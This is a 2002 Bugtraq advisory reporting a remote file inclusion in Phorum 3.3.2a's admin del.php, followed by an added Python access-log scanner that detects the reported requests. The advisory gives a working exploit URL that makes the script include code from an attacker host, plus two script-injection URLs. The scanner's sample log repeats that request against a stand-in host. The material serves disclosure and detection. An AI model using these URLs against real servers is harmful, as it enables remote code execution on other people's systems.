Bugtraq mailing list archives

Phorum 3.3.2a has another bug for remote command execution


From: "Markus Arndt" <markus-arndt () web de>
Date: Sat, 18 May 2002 12:32:56 +0200

Target:
Phorum 3.3.2a (maybe older)

Description:
Phorum 3.3.2a lets remote users execute arbitrary code

Found by:
Markus Arndt <markus-arndt () web de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed in 3.3.2b

Details:


Another bug for remote command execution.
This time it's admin/actions/del.php
:)

Some code:
<?php
    require "$include_path/delete_message.php";
    delete_messages($id);
    QueMessage("Message(s) $id and all children were deleted!<br>");
?>

The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls

That url will make the script include http://[evilhost]/delete_message.php


GoGoGo and secure your boxes. :)





One other thing before I forget:
CSS-Attacks are possible on 2 files..

http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>


Markus Arndt <markus-arndt () web de>
http://skka.de
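
A log check for the two request patterns reported above, as an added example that is not part of the original post: it flags any request that supplies include_path or a GLOBALS[...] key in the query string, since both variables are meant to be set server-side only. The log lines, the host evil.example and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample log lines (addresses and hosts are documentation values).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2002:12:40:01 +0200] "GET /phorum/admin/actions/'
    'del.php?include_path=http://evil.example&cmd=ls HTTP/1.0" 200 512',
    '192.0.2.11 - - [18/May/2002:12:41:07 +0200] "GET /phorum/admin/footer.php'
    '?GLOBALS%5Bmessage%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.0" 200 734',
    '192.0.2.12 - - [18/May/2002:12:42:30 +0200] "GET /phorum/list.php?f=1 '
    'HTTP/1.0" 200 9120',
]

def classify(log_line):
    """Return a sorted list of findings for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    findings = set()
    query = urlsplit(m.group(1)).query
    # parse_qsl percent-decodes names and values, so encoded variants match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "include_path":
            # The script expects this variable to come from server config only.
            findings.add("include_path-from-request")
            if REMOTE_SCHEME_RE.match(value):
                findings.add("remote-include-url")
        if name.startswith("GLOBALS["):
            findings.add("globals-override")
            if "<script" in value.lower():
                findings.add("script-in-parameter")
    return sorted(findings)

def scan(lines):
    """Map 1-based line number to findings, for flagged lines only."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(n, ", ".join(findings))
```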